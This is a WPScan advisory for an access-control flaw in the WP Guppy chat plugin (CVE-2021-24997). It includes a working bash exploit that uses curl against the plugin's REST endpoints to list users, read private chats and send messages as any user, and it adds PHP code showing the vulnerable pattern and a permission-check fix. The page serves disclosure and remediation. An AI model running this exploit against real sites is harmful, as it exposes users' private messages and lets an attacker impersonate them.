WPScan

WordPress Plugin Vulnerabilities

WP Guppy < 1.3 - Sensitive Information Disclosure

Description

The plugin does not perform any authorisation checks on some of its REST API endpoints, allowing any user to call them. This can lead to sensitive information disclosure, such as usernames and the chats between users, and also allows messages to be sent as an arbitrary user.

Proof of Concept

#!/bin/bash
#Exploit Title: Wordpress Plugin WP Guppy A live chat - WP-JSON API Sensitive Information Disclosure
#Exploit Author: Keyvan Hardani
#Date: 22/11/2021
#Vendor Homepage: https://wp-guppy.com/
#Version: up to 1.1
#Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
#Usage ./exploit.sh -h

Help()
{
   # Display Help
   echo "Usage"
   echo
   echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
   echo
   echo "Option 1: Get all users ( ./exploit.sh 1 domain.com )"
   echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => receiverId=1493 & userId (sender)=1507"
   echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493 ) => receiverId=1507 & userId=1493"
   echo "-h  Print this Help."
   echo
}

while getopts ":h" option; do
   case $option in
      h) # display Help
         Help
         exit;;
   esac
done

# Every option needs at least the option number and the target domain
if [ "$#" -lt 2 ]; then
   Help
   exit 1
fi

if [ "$1" = 1 ]
	then
	# Unauthenticated listing of users (no authorisation check on the endpoint)
	curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi

if [ "$1" = 2 ]
	then
	# Send a message with an arbitrary sender (userId) to an arbitrary receiver (receiverId)
	curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json' | python -m json.tool
fi

if [ "$1" = 3 ]
	then
	# Read the conversation between two arbitrary users
	curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi
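The root cause described above is a REST route registered without an authorisation check (CWE-862). The following is an added example, not WP Guppy's own code, showing that pattern next to the standard WordPress fix: a permission_callback that first authenticates the caller and then checks that the caller is allowed to touch the specific conversation requested. The guppy/v2 namespace and the route names come from this advisory; every function prefixed hypothetical_, including the storage stand-ins, is an assumption, since the plugin's real implementation is not shown on this page.

```php
<?php
// Added example (not WP Guppy's code): missing-authorisation pattern and its fix.
// Route names are from the advisory; all "hypothetical_" functions are assumed.

// VULNERABLE PATTERN (as a comment so each route is registered only once below):
//   register_rest_route( 'guppy/v2', '/load-guppy-user-chat', array(
//       'methods'             => WP_REST_Server::READABLE,
//       'callback'            => 'hypothetical_load_user_chat',
//       'permission_callback' => '__return_true',   // or omitted entirely
//   ) );
// '__return_true' (or no permission_callback at all) makes the route public, so an
// unauthenticated caller can pass any userId/receiverId and read that conversation.

// HARDENED: authenticate the caller, then authorise the object being requested.
function hypothetical_chat_permission( WP_REST_Request $request ) {
    if ( ! is_user_logged_in() ) {
        return new WP_Error( 'rest_forbidden', 'Authentication required.', array( 'status' => 401 ) );
    }
    // Object-level check: the userId in the request must be the authenticated user
    // (administrators excepted), otherwise any user could read any other user's chats.
    $requested = absint( $request->get_param( 'userId' ) );
    if ( $requested !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {
        return new WP_Error( 'rest_forbidden', 'You may only read your own chats.', array( 'status' => 403 ) );
    }
    return true;
}

function hypothetical_load_user_chat( WP_REST_Request $request ) {
    $user_id     = absint( $request->get_param( 'userId' ) );
    $receiver_id = absint( $request->get_param( 'receiverId' ) );
    return rest_ensure_response( hypothetical_fetch_messages( $user_id, $receiver_id ) );
}

function hypothetical_send_message( WP_REST_Request $request ) {
    // The sender is always the authenticated user; a client-supplied 'userId' in the
    // body is ignored, which removes the "send as an arbitrary user" problem.
    $sender   = get_current_user_id();
    $receiver = absint( $request->get_param( 'receiverId' ) );
    $text     = sanitize_text_field( $request->get_param( 'message' ) );
    if ( '' === $text || 0 === $receiver ) {
        return new WP_Error( 'rest_invalid_param', 'receiverId and message are required.', array( 'status' => 400 ) );
    }
    $id = hypothetical_store_message( $sender, $receiver, $text );
    return rest_ensure_response( array( 'id' => $id, 'senderId' => $sender, 'receiverId' => $receiver ) );
}

// Hypothetical storage stand-ins kept in one option so the example is complete;
// the plugin's real persistence layer is not on the page.
function hypothetical_store_message( $sender, $receiver, $text ) {
    $log   = get_option( 'hypothetical_guppy_messages', array() );
    $log[] = array( 'senderId' => $sender, 'receiverId' => $receiver, 'message' => $text, 'time' => time() );
    update_option( 'hypothetical_guppy_messages', $log, false );
    return count( $log );
}

function hypothetical_fetch_messages( $user_id, $receiver_id ) {
    $log = get_option( 'hypothetical_guppy_messages', array() );
    return array_values( array_filter( $log, function ( $m ) use ( $user_id, $receiver_id ) {
        return ( $m['senderId'] === $user_id && $m['receiverId'] === $receiver_id )
            || ( $m['senderId'] === $receiver_id && $m['receiverId'] === $user_id );
    } ) );
}

add_action( 'rest_api_init', function () {
    register_rest_route( 'guppy/v2', '/load-guppy-user-chat', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'hypothetical_load_user_chat',
        'permission_callback' => 'hypothetical_chat_permission',
        'args'                => array(
            'userId'     => array( 'required' => true, 'sanitize_callback' => 'absint' ),
            'receiverId' => array( 'required' => true, 'sanitize_callback' => 'absint' ),
        ),
    ) );

    register_rest_route( 'guppy/v2', '/send-guppy-message', array(
        'methods'             => WP_REST_Server::CREATABLE,
        'callback'            => 'hypothetical_send_message',
        'permission_callback' => function () {
            return is_user_logged_in()
                ? true
                : new WP_Error( 'rest_forbidden', 'Authentication required.', array( 'status' => 401 ) );
        },
    ) );
} );
```

With these callbacks in place, the three unauthenticated requests in the proof of concept above receive 401 responses, and a logged-in user asking for another user's conversation receives 403. Because WordPress core only recognises a cookie-authenticated REST request when it carries a valid X-WP-Nonce header, is_user_logged_in() is false for requests that lack it, so the same check also covers cross-site requests. The load-guppy-users endpoint from the PoC is not shown here but needs the same treatment: a permission_callback that decides who may list users, rather than __return_true.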
 

Affects Plugins

wp-guppy
Fixed in version 1.3

References

CVE
CVE-2021-24997
URL
https://github.com/Keyvanhardani/WP-Guppy-A-live-chat-WP-JSON-API-Sensitive-Information-Disclosure
ExploitDB
50540

Classification

Type

NO AUTHORISATION

OWASP top 10
A5: Broken Access Control
CWE
CWE-862

Miscellaneous

Original Researcher

Keyvan Hardani

Submitter

Keyvan Hardani

Submitter website
http://hardani.de
Verified

Yes

WPVDB ID
747e6c7e-a167-4d82-b6e6-9e8613f0e900

Timeline

Publicly Published

2021-11-22 (about 1 year ago)

Added

2021-11-23 (about 1 year ago)

Last Updated

2022-04-09 (about 9 months ago)
